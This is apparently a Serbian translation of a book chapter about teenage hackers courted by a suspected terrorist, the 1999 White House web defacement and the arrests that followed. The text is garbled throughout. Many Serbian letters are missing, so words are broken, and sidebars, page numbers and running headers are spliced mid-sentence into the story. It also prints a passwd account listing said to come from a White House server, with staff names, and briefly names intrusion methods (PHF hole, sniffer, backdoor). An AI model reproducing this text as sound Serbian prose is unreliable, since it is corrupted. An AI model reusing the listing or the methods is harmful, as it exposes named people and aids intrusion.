On uglavnom nije konkretno govorio ta hoe hteo je pristup

vladinim i vojnim prezentacijama. Osim kada je u pitau
bio SIPRNET. Informacije sa SIPRNET-a je zaista eleo.
Nije ni udo to je Kalid udeo za tim podacima. Oni su verovatno
bili egov ci od samog poetka. SIPRNET je deo mree odbrambenog informacionog sistema, DISN-a (engl. Defense Information System
Network), koji prenosi poverive poruke. tavie, SIPRNET (skraenica za Secret Internet Protocol Router Network) sada je sr komandovaa i kontrole u vojsci SAD.
ne0h je ve odbio Kalidovu ponudu da prodre u SIPRNET:
Ponudio je 2.000 dolara. Odbio sam ga. Da sam uao u SIPRNET, federalci bi mi zaas doli na vrata. 2.000 dolara
nije vredno rupe u glavi.
Kada je Kalid razgovarao s Comradeom o tom zadatku, cena je skoila. Mislim da je rekao da e platiti deset hiada dolara za pristup,
31
Zapravo, 4.000 dolara bi bilo previe za te informacije. Sudei po bivem direktoru bezbednosti Boinga, Donu Belingu, ovaj upad se moda
zaista desio kao to je opisano. Meutim, on bi bio isto gubee vremena: kada nov tip aviona ue u eksploataciju, sve putnike agencije dobijaju kompletne skupove ema. U tom trenutku, te informacije se vie
ne smatraju osetivim. Moe ih dobiti svako ko poeli. Nedavno sam
na lokaciji eBay video i CD sa emama za 747, rekao je Don. Naravno,
Kalid to verovatno nije znao. Prolo je dve godine dok nacija nije otkrila
da su neki teroristi imali jake razloge da ele eme glavnih putnikih
aviona koje koriste amerike avionske kompanije.
prisea se Comrade. To je bila dobra pogodba udima koji se nisu snebivali da prihvate projekte. Ipak, on tvrdi da ga je u iskuee bacio izazov, a ne novac.
Umee provale
32
U stvari, SIPRNET-u sam se dosta primakao. Uao sam u jedan raunarski sistem u DISA (Defense Information Security
Agency).Taj raunar je bio izuzetno dobar. Mislim da je imao
etiri procesora, oko 2.000 udi je imalo pristup, Unixova datoteka sa IP adresama imala je oko 5.000 razliitih servera, a
polovina je koristila privilegovane naloge. Morao si da bude
za tim raunarom da bi mu pristupio nisi to mogao da uradi spoa.
Kako god da je to zakuio, Comrade je ispravno slutio da je nabasao
na neto bitno. Glavne misije DISA ukuuju zdruenu komandu i kontrolu, i raunarsku podrku jedinicama u borbi mudro preklapae sa
funkcijama SIPRNET-a. Meutim, egovi napori su saseeni.
Bilo je simpatino imati sve te pristupe, ali nisam imao dovono vremena da se time poigram i uradim neto. Ukebali su me
tri ili etiri dana kasnije.
Vreme za zabrinutost
Na Boi 1999, ne0h i Comrade su doiveli ok. Let IC-814 Indian
Airlinesa, na pravcu Katmandu Nju Delhi, sa 178 putnika i 11 lanova posade, otet je u toku leta. Reporteri su javili da su otimai bili pakistanski teroristi povezani s Talibanima. Teroristi kao to je Kalid?
Pod komandom otmiara, Airbus A300 nastavio je cik-cak putaom
do Sredeg Istoka i nazad, nakratko sletevi u Indiji, Pakistanu i Ujedienim Arapskim Emiratima, gde je izbaeno telo zaklanog putnika. Bio
je to mlad ovek koji se sa tek venanom suprugom vraao kui s medenog meseca. On je na smrt izboden jer je odbio da stavi povez na oi.
Avion je konano sleteo u Kandahar u Avganistanu to je dodatno
ukazivalo na vezu s Talibanima. Preostali putnici i posada zadrani su u
avionu tokom osam dana ispuenih terorom, i na kraju su puteni u
zamenu za oslobaae tri uhapena militanta. Jedan od osloboenih
zatvorenika, eik Umer, kasnije je pomogao u finansirau Mohameda
Ate, voe napada na Svetski trgovinski centar 11. septembra.
Nakon otmice, ne0h je saznao od Kalida da je egova grupa odgovorna i da je i on sm uestvovao u otmici.
Na smrt sam se uplaio. On je bio lo. Oseao sam da moram

da sauvam ivu glavu.
Comrade je uhapen
Situacija je postala gusta, a uskoro e se i pogorati. Nekoliko dana poto
je Comrade uspeo da prodre u sistem povezan sa SIPRNET-om, egovog oca je na putu do posla zaustavila policija. Rekli su mu: Hoemo
da razgovaramo s tvojim sinom, i pokazali mu nalog za pretres. Comrade se prisea:
Bilo je tu udi iz NASA, Ministarstva odbrane, FBI-ja. Sve u

svemu, bilo je oko deset ili dvanaest agenata, i nekoliko policajaca. Petao sam po nekim Nasinim sanduiima, postavio
sam ukalo na ns3.gtra.mil da bih pokupio lozinke. Ali,
tako sam pokupio i e-poruke. Rekli su mi da sam zbog toga
optuen za nelegalno prislukivae. A za Nasine raunare dobio sam kree zatienih prava. I druge stvari.
Samo dan ranije, prijate mi je rekao: ovee, uskoro e nas
uhvatiti. Odlepio je. Pomislio sam: U pravu je. Zato sam
obrisao svoj disk.
33
Ali egovu zabrinutost ublaavala je deaka pohlepa. I dae sam

se nadao da e mi isplatiti moj novac, dodao je ne0h.
Veza sa otmicom dolila je ue na vatru koju je Kalid ranije zapalio.
U jednom trenutku, oigledno iznerviran neuspenim pokuajima tinejdera da mu pribave informacije koje je traio, Kalid je pokuao s
taktikom visokog pritiska. Novinar Nil Makaj, u ranije navedenoj prii
za wired.com, napisao je da je video staru poruku na IRC-u koju je Kalid poslao ovim mladiima i u kojoj je pretio da e ih ubiti ako ga prijave Federalnom istranom birou. Makaj je napisao da je video i sledeu
poruku od Pakistanca: Hou da znam: da li je [iko] priao federalcima
o meni? A na drugom mestu: Reci im [ako to urade] da su mrtvi. Nahukau snajperiste na ih.2
Meutim, Comrade nije bio temean pri ieu. Zaboravio sam

stare diskove koji su mi stajali na stolu.
Ispitivali su me. Priznao sam. Rekao sam: ao mi je. Evo ta

sam uradio, evo kako ete popraviti, vie to neu raditi. A oni
su rekli, kao: U redu, neemo te tretirati kao kriminalca. Nemoj to vie da radi. Ako to ponovo uradi, ne ginu ti lisice.
Spakovali su moje raunare, periferne ureaje i rezervne diskove, i otili.
Umee provale
34
Kasnije su pokuali da nateraju Comradea da im kae lozinku za svoje ifrovane diskove. Kada je odbio, rekli su da znaju kako da ih provale.
Comrade je mislio da ne mogu: koristio je PGP ifrovae i lozinka mu
je bila duga oko sto znakova. Ipak, on tvrdi da nije bila teka za
pamee bila su to egova tri omiena citata spojena u niz.
Oko est meseci nije imao kontakta s policijom. A onda je jednog
dana uo da e vlada podneti tubu. Do trenutka kada je dospeo na sud,
bio je optuen za, kako je tuilac tvrdio, tronedeno iskuivae Nasinih raunara i presretae hiada poruka unutar Ministarstva odbrane.
(Kao to i sm vrlo dobro znam, teta koju tuioci navode i stvarna
teta ponekad su veoma razliite. Comrade je iz Nasinog centra Marshall
Space Flight u Alabami preuzeo softver koji se koristi za kontrolisae
temperature i vlanosti u meunarodnoj svemirskoj stanici. Vlada je tvrdila da je zbog toga morala da na tri nedee iskui odreene raunarske
sisteme. Napad na Ministarstvo odbrane pruio je realistiniji razlog za
brigu: Comrade je provalio u raunarski sistem Odbrambene agencije za
ublaavae preti (engl. Defense Threat Reduction Agency) i instalirao
zada vrata koja su mu omoguila pristup u bilo koje vreme.)
Vlada je oigledno ovaj sluaj smatrala bitnim za upozoravae ostalih hakera tinejdera. U medijima je sueu posveena velika paa i
Comrade je proglaen najmlaom osobom koja je ikada osuena za hakerisae kao federalni zloin. Glavni tuilac Denet Rino je ak dala izjavu u kojoj kae: Ovaj sluaj, u kom e prvi put maloletni haker
sluiti zatvorsku kaznu, pokazuje da ozbino shvatamo raunarske upade i da sa svojim partnerima iz kriminalistike slube radimo na agresivnoj borbi protiv ovih pojava.
Ispitivae Kalida
Da li je Kalid bio militant kao to je tvrdio, ili samo prevarant koji je
manipulisao tinejderima? Ili je to moda bila operacija Federalnog istranog biroa kojom su isprobavali koliko daleko su mladi hakeri voni da
idu? Pre ili kasnije, svaki haker koji je imao posla s Kalidom posumao
je da on nije zaista bio militantni aktivista. ini se da ih je pomisao da su
informacije davali stranom agentu muila mae od mogunosti da ih je
taj tip samo navukao. Comrade kae da se najvie pitao ta je [Kalid]
bio. Nisam znao da li je federalac ili je bio ono to je tvrdio. Na osnovu
35
Sudija je Comradea osudio na est meseci zatvora i est meseci uslovne kazne, s poetkom nakon zavretka polugodita. Comradeova majka
je tada jo bila iva. Angaovala je novog advokata, napisala mnogo pisama, sudiji je prikazala potpuno nov sluaj i, za divno udo, uspela
da smai kaznu na kuni pritvor i potom etiri godine uslovne kazne.
Ponekad u ivotu ne koristimo anse koje nam se pruaju. Odsluio
sam kuni pritvor i u toku je bila uslovna kazna. Razne stvari su se desile,
poeo sam previe da se zabavam, pa su me poslali na rehabilitaciju.
Kada je rehabilitacija prola, Comrade se zaposlio u Internet kompaniji i
zapoeo sopstveni posao sa Internetom. Meutim, on i slubenik za uslovnu kaznu nisu su previe viali, pa je Comrade na kraju ipak otiao u
zatvor. Imao je samo esnaest godina, a zatvoren je za dela koja je poinio
kada je imao petnaest.
U federalnom kaznenom sistemu nema tako mnogo maloletnika.
Ispostavilo se da su ga poslali u kamp (prava re za to mesto) u Alabami, u kom je bilo samo deset zatvorenika. Comrade za kamp kae da je
vie nalik koli zakuana vrata i ograda od bodikave ice, ali inae
nije imalo mnogo veze sa zatvorom. ak nije morao da ide na asove
jer je ve zavrio sredu kolu.
Kada se vratio u Majami i na sluee uslovne kazne, Comrade je dobio spisak hakera s kojima ne sme da razgovara. Na listi je pisalo, ovaj
tip, onaj tip i ne0h. Samo ne0h federalna vlada ga je znala samo
po identifikaciji. Nisu imali pojma ko je on. Ako sam ja imao pristup
do dve stotine stvari, on je imao pristup do hiadu, kae Comrade.
ne0h je bio prilino vet. Koliko oni znaju, krivini organi jo uvek
nisu uspeli da otkriju egovo ime ili lokaciju.
Umee provale
36
razgovora koji su vodili ne0h i Kalid, zakuio sam da ne lae. Ali nikada
od ega nisam uzeo novac to je bila granica koju nisam hteo da
preem. (Ranije u razgovoru, kada je prvi put pomenuo deset hiada
dolara koje je Kalid ponudio, Comrade je zvuao impresioniran sumom.
Da li bi odbio novac ukoliko bi egovi pokuaji bili uspeni, a Kalid mu
zaista platio? Moda ni sam Comrade ne zna da odgovori na to pitae.)
ne0h kae da je Kalid zvuao potpuno profesionalno ali priznaje
da se povremeno pitao je li ovaj zaista militantni aktivista. Sve vreme
dok sam razgovarao s im, mislio sam da previe baezga. Ali nakon
istraivaa s prijateima koji su s im razgovarali i kojima je davao
druge informacije, zakuili smo da je zaista bio ono to je tvrdio.
Haker Savec0re je na IRC-u sreo nekoga ko je rekao da u FBI ima
strica koji bi mogao da sredi imunitet za celu hakersku grupu Milw0rm. Mislim da bismo time poslali poruku FBI-ju da nismo neprijateski nastrojeni, Savec0re je rekao Makaju u intervjuu putem e-pote.
Dao sam mu moj broj telefona. Sledeeg dana me je pozvao navodni
FBI agent sa zauujue jakim pakistanskim akcentom.
Rekao je da se zove Majkl Gordon i da je radio za FBI u Vaingtonu, Savec0re je ispriao novinaru. Shvatio sam da je to sve vreme bio
Ibrahim. Mada su se neki udi pitali da li je navodni terorista bio tajni
agent Federalnog istranog biroa, Savec0re je doao do suprotnog zakuka: da je tip koji je tvrdio da je FBI agent u stvari isti terorista koji je
pokuavao da vidi jesu li su momci spremni da propevaju o emu.
Ideja da je to moda bila operacija FBI-ja nema vrste osnove. Ukoliko je federalna vlada htela da otkrije za ta su ovi klinci sposobni i koliko daleko su spremni da idu, obeani novac bi stigao. Kada FBI
pomisli da je situacija dovono ozbina da zahteva angaovae tajnog
agenta, oni u taj trud ulau novac. Neverovatno bi bilo da su obeali
1000 dolara, a da to nisu platili.
Izgleda da je samo jedan haker zaista dobio novac od Kalida Kameleon. Jedno jutro sam otiao do sandueta i u emu je bio ek na
hiadu dolara s brojem koji treba da pozovem u Bostonu, ispriao je
Kameleon u prii za Wired News (4. novembra 1998). Kalid je saznao
da on ima mape vladine raunarske mree ek je bio uplata za te
mape. Kameleon je unovio ek. Dve nedee kasnije FBI mu je upao u
kuu i ispitivao ga o isplati, to pokree zanimivo pitae o tome kako
je vlada saznala za tih hiadu dolara. To se desilo pre 11. septembra,
Organizacija Harkat ul-Mudahedin

Dok je pretraivao dnevnike interaktivnih razgovora na Internetu, novinar Makaj je otkrio da se Kalid jednom prilikom predstavio mladim
hakerima kao lan organizacije Harkat-ul-Ansar3. Sudei po Pregledu
obavetajne slube June Azije (South Asia Intelligence Review), SAD
su proglasile Harkat-ul-Ansar teroristikom organizacijom zbog ihove
veze s proteranim saudijskim teroristom Osamom Bin Ladenom 1997.
Da bi se izbegle posledice amerike zabrane, grupa je 1998. promenila
ime u Harkat ul-Mudahedin.4
Ministarstvo inostranih poslova SAD iznova je upozoravalo na tu
grupu. Jedna ihova objava kae: Pakistanski zvaninici su izjavili da su
u amerikim vazdunim napadima 23. oktobra [2001] ubijena 22 pakistanska gerilca koji su se borili uz Talibane u blizini Kabula. Poginuli
su bili lanovi organizacije Harkat ul-Mudahedin... [koju] je Ministarstvo inostranih poslova postavilo na zvaninu listu teroristikih organizacija 1995.5
Zapravo, Harkat je danas jedna od trideset est grupa koje su u SAD
oznaene kao strane teroristike organizacije. Amerika vlada ih, drugim reima, smatra najgorim udima na kugli zemaskoj.
Naravno, mladi hakeri to nisu znali. Za ih je sve bila samo igra.
Govorei u aprilu 2002. o bezbednosti informacija, general-major
indijskih vojnih snaga, potvrdio je da je Kalid terorista, ispriavi o
37
dok se FBI fokusirao na domai kriminal i slabo pratio teroristike prete. Kameleon je priznao da je uzeo novac, ali je novinaru Wired Newsa
tvrdio da nije dao nikakve mape vladine mree.
Mada je Kameleon priznao da je uzeo novac od stranog teroriste, za
ta bi mogao biti optuen za pijunau i dobiti veoma dugu zatvorsku
kaznu, nikakva optunica nije bila podignuta to dae produbuje
misteriju. Moda je vlada samo htela da se po hakerskoj zajednici prouje da saraivae sa stranim agentima moe biti rizino. Moda ek i
nije bio od Kalida, ve od FBI-ja.
Samo nekoliko udi zna Kameleonov pravi identitet, i on bi voleo
da tako i ostane. Hteli smo da ujemo egovu verziju prie. Odbio je
da govori o tome (samo pomenuvii kako je mislio da je Kalid u stvari
federalac koji se predstava kao terorista). Da sam na egovom mestu,
ni ja ne bih hteo da me intervjuiu na tu temu.
hakerskim vezama sa Kalidom Ibrahimom iz organizacije Harkat-ulAnsar smetene u Pakistanu.6 General se, meutim, pribojavao da Kalid nije u Pakistanu ve u Delhiju, u Indiji.
Posledice 11. septembra
Umee provale
38
Neki hakeri manipuliu i obmauju. Oni varaju raunarske sisteme

navodei ih da pomisle kako imaju ovlaea koja su zapravo ukrali.
Oni vebaju lano predstavae da bi manipulisali udima i postigli
svoje cieve. Sve to znai da, kada govorite s hakerom, morate sluati
paivo i utvrditi da li ono to vam govori, i nain na koji to govori,
zvui uverivo. Ponekad prosto neete biti sigurni.
Koautor ove kige i ja nismo bili sigurni u ono to nam je ne0h rekao o svojoj reakciji na 11. septembar. Poverovali smo mu toliko da vam
prenesemo egovu izjavu.
Znate li koliko sam plakao tog dana? Bio sam siguran da je gotovo s mojim ivotom.
Te rei je propratio udnim, nervoznim smehom s kojim znaeem? Nismo mogli da odredimo.
Pomisao da sam imao veze s tim. Da sam uao u Lockheed

Martin ili Boing i doao do jo informacija, mogli su da ih iskoriste. Bilo je to loe vreme za mene i za Ameriku.
Plakao sam jer nikada nisam pomislio na to da ga prijavim.
Nisam dobro rasuivao. To je bio razlog zbog kog me je angaovao da uradim sve te stvari...
[Pomisao] da sam i malim prstom uestvovao u onom to se
desilo s Trgovinskim centrom... u potpunosti me je skrhala.
U Svetskom trgovinskom centru stradala su tri moja druga.
Nikada se nisam oseao tako loe.
Mnogi hakeri su tinejderi, pa ak i mlai. Da li je to prerano da bi
se prepoznala potencijalna opasnost ili reagovalo na zahteve nekoga ko
bi mogao predstavati pretu zemi? Mislim da su nakon 11. septembra ameriki hakeri ak i oni veoma mladi postali sumiavi i da je
malo verovatno da e ih teroristi prevariti. Nadam se da sam u pravu.
Upad u Belu kuu
Mislim da su u Beloj kui reinstalirali operativni sistem. Sve

su vratili na podrazumevane vrednosti. I u tom periodu, u trajau od deset, petnaest minuta, Zyklon i MostFearD uspeli su
da uu, dou do skrivene datoteke lozinki, provale je, uu, i
promene Web prezentaciju. Bio sam tamo dok su to radili.
Trebalo je samo da budu na pravom mestu u pravo vreme.
Desilo se sluajno bila je ista srea da su se zadesili na vezi
ba kada je neko radio na prezentaciji.
39
Istorija raunarske bezbednosti u neku ruku ima slinosti s davnom

istorijom kriptografije. Vekovima su udi smiali ifre koje su oznaavali kao nemogue za otkrivae. ak i danas, u eri raunara koji
mogu brzo ifrovati poruku pomou kua za jednokratnu upotrebu, ili
kua koji sadri stotine znakova, veina kodova i dae se moe deifrovati. (Amerika organizacija za ifrovae i deifrovae, Agencija za
nacionalnu bezbednost engl. National Security Agency, razmee se brojem najveih, najbrih i najmonijih raunara na svetu.)
Bezbednost raunara je kao stalna igra make i mia u kojoj su struaci za bezbednost na jednoj strani, a upadai na drugoj. Operativni sistem Windows sadri desetine miliona redova koda. Sasvim je jasno da
svaki ogroman softver mora da sadri slabosti koje e posveeni hakeri
pre ili kasnije otkriti.
U meuvremenu, radnici u kompanijama, inovnici, ponekad i profesionalci u oblasti bezbednosti, instalirae nov raunar ili program i zaboraviti da promene podrazumevanu ifru, ili se nee potruditi da smisle
ifru koja je bar donekle sigurna ostavajui ureaj u raivom stau.
Ako itate vesti o hakerskim napadima i upadima, znate da su vojne
i vladine prezentacije, ak i Web prezentacija Bele kue, ve ugroene.
Ponekad neprestano.
Upad na prezentaciju i meae Web strane je jedno to je uglavnom trivijalna, ili bar dosadna stvar. I pored toga, mnogi udi se oslaaju na samo jednu lozinku koju koriste svuda. Ukoliko provaivae
u Web prezentaciju vodi do hvataa lozinki, napada moe dospeti u
situaciju da ima pristup ostalim sistemima u mrei i moe da napravi
mnogo veu tetu. ne0h kae da su 1999. godine on i jo dva lana hakerske grupe gLobaLheLL uradili upravo to, na jednom od najosetivijih mesta u SAD-u u Beloj kui.
O tome smo priali u priaonici grupe gLobaLheLL. Probudio

me poziv oko 3 ujutro kojim su me obavestili ta se deava. Rekao sam: Baezga. Dokai. Skoio sam za raunar. I stvarno, uradili su to.
MostFearD i Zyklon obavili su najvei deo posla. Dali su mi
skrivenu datoteku da je provalim to bre mogu. Doao sam do
jedne [lozinke] bila je to obina re iz renika. I to je bilo to.
Umee provale
40
ne0h nam je dao deo koda za koji kae da je datoteka lozinke koju su
ostali nabavili i preneli mu. U oj je naizgled nabrojano nekoliko ovlaenih korisnika, lanova osoba Bele kue7:
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:6001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh
orion:x:1002:10:Christopher
Adams:/usr/users/orion:/usr/ace/sdshell
webadm:x:1130:101:Web
Administrator:/usr/users/webadm:/bin/sh
cadams:x:1003:10:Christopher
Adams:/usr/users/cadams:/usr/ace/sdshell
bartho_m:x:1004:101:Mark
Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell
monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh
debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh
connie:x:1149:101:Connie
Colabatistto:/usr/users/connie:/bin/sh
bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
Ovo je vrsta Unixove ili Linuxove datoteke lozinki, kakva se koristi

za skladitee ifrovanih lozinki u posebnoj, zatienoj datoteci. Svaki
red navodi ime jedne osobe koja ima nalog na sistemu. Unos sdshell u
Slika 2-1: Strana kojom je zameena

Web prezentacija Bele kue, maj 1999.
Koliko se ne0h sea, momci odgovorni za ovaj upad na prezentaciju

Bele kue nisu bili naroito ushieni to su uspeli da upadnu na jednu
41
nekim redovima nagovetava da ti korisnici, zbog dodatne sigurnosti,

imaju mali elektronski ureaj nazvan RSA SecureID. On prikazuje
estocifreni broj koji se mea svakih ezdeset sekundi. Da bi se prijavili,
ti korisnici moraju da unesu estocifreni broj koji je u tom trenutku prikazan na ihovom ureaju SecureID, i lini identifikacioni broj, PIN
(koji ponegde dodeuje kompanija, a nekad ga bira sam korisnik). Web
prezentaciji Bele kue promeena je matina strana u isto vreme kada
je na u provaeno, kao dokaz da su hakeri bili tu, objasnio je ne0h.
Dao nam je i vezu do upotrebene strane (slika 2-1).8 Pored simbola
hakerske grupe gLobaLheLL, poruka sadri i logotip Hong Kong Danger Duo. To je, kae ne0h, lano ime koje je izmieno kako bi se dodao
jo jedan element za obmaivae.
Umee provale
42
od otprilike deset najsigurnijih Web prezentacija u zemi. Bili su prilino zauzeti upadaem svuda, objasnio je ne0h, da bi svetu dokazali
da smo najboi. Umesto opteg virtuelnog tapaa po ramenu, on
kae da se atmosfera moe boe opisati kao: Dobro obaven posao,
momci, najzad smo uspeli, ta je sledee?
Ali nije im ostalo mnogo vremena za bilo kakve druge upade. Njihovi svetovi su se ubrzo sruili, a taj deo prie nas ponovo vraa na misterioznog Kalida.
Zyklon, inae poznat kao Erik Barns, odavde preuzima priu. Kae
da nikada zaista nije bio lan grupe gLobaLheLL, ali je visio po IRC
prezentacijama s nekim enim lanovima. Kako on opisuje dogaaje,
upad u prezentaciju Bele kue postao je mogu kada je otkrio da je ona
mogla biti ugroena korieem rupe u programu PHF za pristup telefonskom imeniku postavenom na Web. To je bila najbitnija slabost ali,
mada su u hakerskoj zajednici znali za u, nije je koristilo mnogo udi, kae Zyklon.
Izvodei vie koraka (detano su objaeni u odeku Saetak, kasnije u ovom poglavu), mogao je da zauzme osnovni direktorijum lokacije whitehouse.gov i obezbedi pristup drugim sistemima na lokalnoj
mrei, ukuujui server za e-potu Bele kue. Zyklon je u tom trenutku mogao da presretne poruke izmeu osoba Bele kue i javnosti,
mada te poruke, naravno, ne bi otkrile nikakve poverive informacije.
Meutim, Zyklon je rekao da je mogao i da doe do kopije lozinke
i skrivenih datoteka. Vrali su po prezentaciji, gledali ta mogu da
pronau i ekali da udi ponu da dolaze na posao. Dok je ekao, dobio je poruku od Kalida koji mu je rekao da pie lanak o nedavnim
upadima i pitao Zyklona da li je nedavno imao akcije o kojima bi govorio. I onda sam mu rekao da smo upravo upali na Web prezentaciju
Bele kue, ispriao je Zyklon.
Zyklon mi je rekao da je u roku od par sati ihov program za
praee protoka podataka primeen administrator sistema je pokuavao da otkrije ta se deava i ue u trag udima koji su bili na prezentaciji. Puka sluajnost? Ili je ba tad imao neki razlog da postane
sumiav? Proli su meseci pre nego to je Zyklon pronaao odgovor.
Ali tada, im je prislukiva otkriven, momci su se povukli s prezentacije i nadali se da su pretekli administratora.
Posledice
Kako se desilo da je administrator sistema tako rano ujutro poeo da
uka? Zyklon se nimalo ne dvoumi oko odgovora. Kada su tuioci
sakupili dokumente za ovaj sluaj, pronaao je izjavu da su informacije
koje su vodile do saznaa vezanih za upad grupe gLobaLheLL u prezentaciju Bele kue, dobijene od dounika FBI-ja. Koliko se on sea, u
dokumentu je pisalo i da se taj dounik nalazio u Nju Delhiju, u Indiji.
Po Zyklonovom mieu, nije bilo nikakve sume. Jedina osoba
kojoj je rekao za upad u Belu kuu jedina osoba bio je Kalid Ibrahim. Jedan plus jedan jesu dva: Kalid je bio dounik FBI.
Ali misterija ostaje. ak i ako je Zyklon u pravu, da li je to cela
pria? Kalid je bio dounik, pomagao je FBI-ju da pronae klince hakere koji su bili raspoloeni da upadaju na osetive prezentacije? Ili moda
postoji jo jedno mogue objaee: da je egova uloga dounika bila
samo pola prie, a da je on zapravo bio i pakistanski terorista, kao to je
mislio indijski general. ovek koji igra dvostruku ulogu: pomae interesima Talibana dok je infiltriran u FBI.
Njegov strah da e ga neki klinac prijaviti FBI-ju uklapa se u ovu
verziju prie.
43
Meutim, anuli su u osie gnezdo. Oko dve nedee kasnije, FBI

se ustremio na sve lanove grupe gLobaLheLL koje su mogli da identifikuju. Pored Zyklona tada je imao 19 godina i uhapen je u dravi
Vaington uhapeni su i MostHateD (Patrik Gregori, takoe 19 godina, iz Teksasa), MidPhasr (ad Dejvis iz Viskonsina), i drugi.
ne0h je bio meu par hakera koji su preiveli napad. Sa bezbedne
udaene lokacije on je, razjaren, postavio stranu na Web prezentaciju sa
prkosnom porukom. Ona je u prvom trenutku glasila: Sluajte vi gadovi iz FBI. Ne z_ se s naim lanovima jer ete izgubiti. Dok ovo piem mi drimo fbi.gov. UPLAILI STE SE. Uhapeni smo jer vai
glupi idioti ne mogu da ukapiraju ko je upo u belu kuu... jel tako? pa
ste nas sve uorkirali da vidite jel e neko da ga otkuca. PUNO J_
SREE. MI NISMO CINKAROI. Kapirate? REKAO SAM DOMINACIJA SVETOM.
I potpisao je: Nemilosrdni ne0h.9
Samo nekoliko udi zna istinu. Pitae je da li su meu ima i

agenti FBI i federalni tuioci koji su ukueni u sluaj. Ili su i oni nasamareni?
Na kraju, Patrik Gregori i ad Dejvis osueni su na dvadeset est
meseci, a Zyklon Barns na petnaest. Sva trojica su odsluila kazne i vie
nisu u zatvoru.
Pet godina kasnije
Umee provale
44
Dani hakerisaa su za Comradea uglavnom samo seae, ali egov

glas ivne kada govori o uzbueu zbog sr_ koja ne biste smeli da pravite, odlaska na mesta na kojima ne biste smeli da budete, nadajui se
da ete naii na neto kul.
Ipak, vreme je da se pone sa ivotom. On kae da razmia o fakultetu. Kada smo razgovarali, upravo se vratio iz skautske kole u Izraelu.
Jezik mu nije bio prevelik problem uio je hebrejski u osnovnoj koli
i iznenadio se koliko je mnogo zapamtio.
Njegovi utisci o toj zemi su pomeani. Devojke su bile ba super,
a Izraelci su pokazali da veoma vole Ameriku. ini se da se ugledaju na
Amerikance. Na primer, provodio je vreme s nekim Izraelcima koji su
pili sok RC Cola za koji nikada nije uo, a ispostavilo se da se pravi u
Americi. Izraelci su objasnili: To je ono to Amerikanci piju u reklamama. Nailazio je i na antiamerike stavove udi koji se ne slau sa
amerikom politikom, ali to ga nije omelo: Pretpostavam da toga
ima svuda.
Vreme mu se nimalo nije dopalo bilo je hladno i kiovito dok je
bio tamo. A onda, bio je tu i problem s raunarima. Zbog puta je kupio
prenosivi raunar i beinu mrenu karticu, ali je otkrio da su zgrade
napravene od ogromnog kamea. Njegov raunar je mogao da vidi
pet ili deset mrea, ali su signali bili previe slabi za povezivae i morao
je da peai dvadeset minuta da bi doao do mesta na kom se moe prijaviti na mreu.
Comrade je sada u Majamiju. Tinejder s dosijeom prestupnika sada
ivi od nasledstva i pokuava da odlui da li e ii na fakultet. Ima dvadeset godina i uglavnom ne radi nita.
Comradeov drugar ne0h radi za veliku telekomunikacionu kompaniju (kae da posao s radnim vremenom od devet do pet nije dobar),
ali e uskoro otii u Los Aneles na tri meseca fizikog rada jer plaaju
mnogo vie nego to sada zarauje. Nada se da e, kao i veina obinih

udi, uspeti da utedi dovono za otplaivae kue u kojoj trenutno ivi.
Kada se tromeseni, dobro plaen posao zavri, i ne0h razmia o
studirau ali ne planira da studira raunarske nauke. Veina udi s
takvim diplomama koje sam sreo nema pojma, rekao je. Umesto toga,
on bi voleo da studira poslovni i organizacioni menadment, a onda da
se raunarima bavi na poslovnom nivou.
Govorei o svojim ranijim avanturama, on ponovo pomie svoju
okupiranost Kevinom. Do koje mere je zamiao da ide mojim stopama?
Koliko je preta velika

Kombinacija odlunih terorista i neustraivih klinaca hakera mogla bi
biti katastrofalna za Ameriku. Ova pria me je naterala da se zapitam
koliko drugih Kalida regrutuje klince (ili nepatriotski nastrojene odrasle sa hakerskim sposobnostima), gladne novca, priznaa ili zadovostva za uspeno obavene teke zadatke. Vrbovnici posle Kalida moda
e biti tajanstveniji i nee se moi tako lako otkriti.
Kada sam bio u pritvoru pre suea, nekoliko puta mi je prilazio
kolumbijski kra droge. Sledovala mu je doivotna robija u federalnom
zatvoru bez mogunosti uslovne kazne. Ponudio mi je primamiv posao: platie mi 5 miliona dolara u gotovom za upad u Sentry raunarski sistem Federalnog biroa za zatvore i egovo oslobaae iz
zatvora. Taj tip je bio stvaran i smrtno ozbian. Nisam prihvatio egovu ponudu, ali sam ostavio utisak da u mu pomoi kako bih izbegao
sukob. Pitam se ta bi ne0h uradio u slinoj situaciji.
Ameriki neprijatei moda treniraju svoje vojnike za kompjutersko
ratovae kojim bi napali ameriku infrastrukturu i odbranili svoju. Ne
morate biti mudrac da biste shvatili da takve grupe mogu angaovati
umene hakere iz bilo kog dela sveta radi obuke, ili za projekte koji su
bitni za misije.
45
Da li sam eleo da budem uhvaen? I jesam i nisam. Ako me

uhvate, to bi bio dokaz da mogu to da uradim i da sam to
uradio. Nije ba da sam namerno hteo da me uhvate. Hteo
sam da me uhvate da bih se borio, oslobodio i onda bio haker
koji je umakao. Izaao bih, naao dobar posao u nekoj vladinoj agenciji i uklopio bih se s podzemem.
Umee provale
46
Godine 1997. i ponovo 2003, Ministarstvo odbrane je pokrenulo

operaciju Eligible Receiver pokuaj da se proveri osetivost nacije na
elektronski napad. U lanku Washington Timesa10 o ranijem ovakvom
pokuaju, objaveno je: Vii rukovodioci Pentagona bili su zapaeni
vojnom vebom koja je pokazala koliko je hakerima lako da obogae
amerike vojne i civilne raunarske mree. lanak objaava da je
Agencija za nacionalnu bezbednost okupila grupu svojih specijalista za
raunare u crveni tim hakera i omoguila im da koriste samo raunarsku opremu koja je dostupna i javnosti, i sve alate za hakerisae,
ukuujui kd za zloupotrebe koji su mogli preuzeti sa Interneta ili
elektronskih oglasnih tabli.
Za nekoliko dana, hakeri iz crvenog tima infiltrirali su se u raunarske sisteme za upravae delovima nacionalne elektrodistribucijske
mree i pomou nekoliko komandi mogli su da zamrae itave delove
zeme. Da ovo nije bila veba, objavio je Christian Science Monitor,
oni su mogli da poremete sistem komunikacije Ministarstva odbrane (i
